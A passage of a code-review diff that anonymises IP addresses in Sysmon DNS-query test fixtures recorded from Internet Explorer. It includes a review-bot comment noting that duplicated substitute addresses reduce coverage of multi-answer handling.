Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802423900Z'/\u003e\u003cEventRecordID\u003e106\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.107\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecsm2waycm-atl.netmng.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 j2waycm.netmng.com;type: 5 j2waycm-us-wdc.netmng.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -2066,7 +2066,7 @@
 "event_data": {
 "QueryName": "pr-bh.ybp.yahoo.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 ds-pr-bh.ybp.gysm.yahoodns.net;::ffff:72.30.2.182;",
+ "QueryResults": "type: 5 ds-pr-bh.ybp.gysm.yahoodns.net;::ffff:89.160.20.156;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:03.112",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
@@ -2077,7 +2077,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802433000Z'/\u003e\u003cEventRecordID\u003e107\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.112\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epr-bh.ybp.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ds-pr-bh.ybp.gysm.yahoodns.net;::ffff:72.30.2.182;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802433000Z'/\u003e\u003cEventRecordID\u003e107\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.112\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epr-bh.ybp.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ds-pr-bh.ybp.gysm.yahoodns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -2090,7 +2090,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802441200Z'/\u003e\u003cEventRecordID\u003e108\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.113\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eps.eyeota.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:3.83.220.223;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802441200Z'/\u003e\u003cEventRecordID\u003e108\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.113\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eps.eyeota.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, @@ -2108,7 +2108,7 @@ }, "event_data": { "QueryStatus": "0", - "QueryResults": "::ffff:3.83.220.223;", + "QueryResults": "::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.113", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -2188,7 +2188,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802456000Z'/\u003e\u003cEventRecordID\u003e109\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.146\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eidpix.media6degrees.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 idpix.media6degrees.com.cdn.cloudflare.net;type: 5 map.media6degrees.com;type: 5 map.media6degrees.com.cdn.cloudflare.net;::ffff:204.2.197.201;::ffff:204.2.197.211;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802456000Z'/\u003e\u003cEventRecordID\u003e109\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.146\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eidpix.media6degrees.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 idpix.media6degrees.com.cdn.cloudflare.net;type: 5 map.media6degrees.com;type: 5 map.media6degrees.com.cdn.cloudflare.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "winlog": { 
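Review bot: Two distinct A-record answers (`::ffff:204.2.197.201;::ffff:204.2.197.211;`) are replaced by the same address twice (`::ffff:89.160.20.156;::ffff:89.160.20.156;`), so this record no longer exercises multi-answer handling: any de-duplication or list construction over `QueryResults` would yield the same expected output whether or not it behaves correctly. Using a second distinct address from the supported set for the second answer would keep the original coverage while still avoiding unsupported public IPs. The same collapse appears in the hunks at -2210, -2419 (four answers folded into one), -2445, -2461 and -2490.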
@@ -2210,7 +2210,7 @@
 "event_data": {
 "QueryName": "idpix.media6degrees.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 idpix.media6degrees.com.cdn.cloudflare.net;type: 5 map.media6degrees.com;type: 5 map.media6degrees.com.cdn.cloudflare.net;::ffff:204.2.197.201;::ffff:204.2.197.211;",
+ "QueryResults": "type: 5 idpix.media6degrees.com.cdn.cloudflare.net;type: 5 map.media6degrees.com;type: 5 map.media6degrees.com.cdn.cloudflare.net;::ffff:89.160.20.156;::ffff:89.160.20.156;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:03.146",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
@@ -2235,7 +2235,7 @@ "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802466200Z'/\u003e\u003cEventRecordID\u003e110\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.146\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etpc.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead-googlehosted.l.google.com;::ffff:172.217.10.1;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802466200Z'/\u003e\u003cEventRecordID\u003e110\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.146\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etpc.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead-googlehosted.l.google.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "log": { "level": "information" 
@@ -2261,7 +2261,7 @@
 "ProcessId": "2736",
 "QueryName": "tpc.googlesyndication.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 pagead-googlehosted.l.google.com;::ffff:172.217.10.1;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;",
+ "QueryResults": "type: 5 pagead-googlehosted.l.google.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:03.146"
 },
@@ -2332,7 +2332,7 @@ { "@timestamp": "2021-05-05T15:30:51.698Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802480600Z'/\u003e\u003cEventRecordID\u003e111\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.182\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimage2.pubmatic.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pug44000nfc.pubmatic.com;type: 5 pug44000nf.pubmatic.com;::ffff:162.248.19.147;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802480600Z'/\u003e\u003cEventRecordID\u003e111\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.182\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimage2.pubmatic.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pug44000nfc.pubmatic.com;type: 5 pug44000nf.pubmatic.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" 
@@ -2353,7 +2353,7 @@
 "ProcessId": "2736",
 "QueryName": "image2.pubmatic.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 pug44000nfc.pubmatic.com;type: 5 pug44000nf.pubmatic.com;::ffff:162.248.19.147;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;"
+ "QueryResults": "type: 5 pug44000nfc.pubmatic.com;type: 5 pug44000nf.pubmatic.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;"
 },
 "process": {
 "thread": {
@@ -2380,7 +2380,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802496100Z'/\u003e\u003cEventRecordID\u003e112\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.183\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esam.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 www.msn.com;type: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:204.79.197.203;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802496100Z'/\u003e\u003cEventRecordID\u003e112\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.183\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esam.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 www.msn.com;type: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "version": 5, @@ -2400,7 +2400,7 @@ "ProcessId": "2736", "QueryName": "sam.msn.com", "QueryStatus": "0", - "QueryResults": "type: 5 www.msn.com;type: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:204.79.197.203;", + "QueryResults": "type: 5 www.msn.com;type: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.183", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" 
@@ -2419,7 +2419,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802516200Z'/\u003e\u003cEventRecordID\u003e113\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' 